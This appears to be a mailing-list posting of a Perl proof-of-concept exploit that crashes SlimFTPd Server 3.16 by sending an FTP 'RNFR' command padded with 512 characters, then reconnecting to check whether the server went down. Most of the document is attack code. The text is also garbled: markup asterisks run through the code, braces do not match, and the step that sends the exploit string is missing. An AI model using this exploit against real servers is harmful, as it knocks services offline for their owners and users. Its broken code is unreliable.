Affected version: 3.16
Bug found by Raphaël Rigo
PoC exploit for demonstration
/# --------------------------------------------------- #/
/# 47slimftpd_bof.pl - PoC exploit for SlimFTPd Server #/
/# version 3.16 #/
/# bug found by ml-bugtraq@xxxxxxxxxxxxxxxxx #/
/# #/
/# coded by k0r0l from acolytez team #/
/# visit http://acolytez.com for details #/
/# --------------------------------------------------- #/
*use* Net::FTP;
/# geting data/
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
/# ===========/
*if* (($host) && ($port)) {
/# make exploit string/
$exploit_string = *"*RNFR *"*;
$exploit_string .= *"*X*"*x512;
/# ===================/
print *"*Trying to connect to $host:$port\n*"*;
$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*;
print *"*[+] Connect OK!\n*"*;
print *"*Logging...\n*"*;
*if* (!$user) {
$user = *"*anonymous*"*;
$pass = *"*ftp@xxxxxxx*"*;
$sock->login($user, $pass);
$answer = $sock->message;
print *"*Sending string...\n*"*;
print *"*Server $host may be down. Checking...\n*"*;
$sock = Net::FTP->new(*"*$host*"*,Port => $port, TimeOut => 30, Debug => $debug) *or* die *"*[-] Connection failed\n*"*;
*if* ($sock) {print *"*[-] Exploit failed.\n*"*;} *else* {print *"*[+] Server crashed!\n*"*;}
} *else* {
print *"*SlimFTPd Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n*"*;
# Dim K0r0l (dim@xxxxxxxxxxxx) #
# #
# http://AcolyteZ.com #
# Net-security, coding, soft etc #